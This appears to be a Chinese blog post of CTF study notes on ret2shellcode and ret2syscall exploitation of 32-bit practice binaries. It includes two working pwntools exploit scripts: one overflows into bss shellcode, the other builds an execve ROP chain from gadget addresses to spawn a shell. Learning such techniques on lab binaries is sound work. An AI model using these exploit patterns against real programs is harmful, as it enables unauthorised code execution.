PWN简单学习ret2shellcod,ret2syscall

2 篇文章 0 订阅

ret2shellcode

在程序中往往不会直接留给回门程序
这时候可以篡改栈帧上的返回地址为攻击者手动传入的 shellcode 所在缓冲区地址,初期往往将 shellcode 直接写入栈缓冲区。
目前由于 the NX bits 保护措施的开启,栈缓冲区不可执行,故当下的常用手段变为向 bss 缓冲区写入 shellcode 或向堆缓冲区写入 shellcode 并使用 mprotect 赋予其可执行权限。
首先看一下基本信息,是一个32位的
在这里插入图片描述
有一段内存可读可写可执行,这是非常危险的。
虽然NX没有打开但是依然不可以直接把shellcode写入栈,因为往往系统默认开启ASLR。
在这里插入图片描述
在这里插入图片描述
输入的值给到buf2,一个全局变量对应bss段。
在这里插入图片描述
宽度为108再加上4字节覆盖返回地址。
payload:

from pwn import *

io = process("./ret2shellcode")
shellcode = asm(shellcraft.sh())
addr = 0x0804A080

payload = shellcode.ljust(112,b'A')+ p32(addr)
io.send(payload)
io.interactive()

在这里插入图片描述

ROP—ret2syscall

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
同时找到字符串:
在这里插入图片描述
addr_sh = 0x080BE408
要组合成:
在这里插入图片描述
在这里插入图片描述
宽度为108加上4字节
利用ROPgadget来找到相关的汇编代码:
eax:
在这里插入图片描述
0x080bb196 : pop eax ; ret
eax_ret = 0x080bb196
ebx:
0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret
edx_ecx_ebx_ret = 0x0806eb90
int:
在这里插入图片描述
int_80h = 0x08049421
payload:

from pwn import *

io = process("./ret2syscall")

eax_ret = 0x080bb196
edx_ecx_ebx_ret = 0x0806eb90
int_80h = 0x08049421
addr_sh = 0x080BE408

payload = flat([b'A'*112,eax_ret,0xb,edx_ecx_ebx_ret,0,0,addr_sh,int_80h])

io.send(payload)
io.interactive()

在这里插入图片描述

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值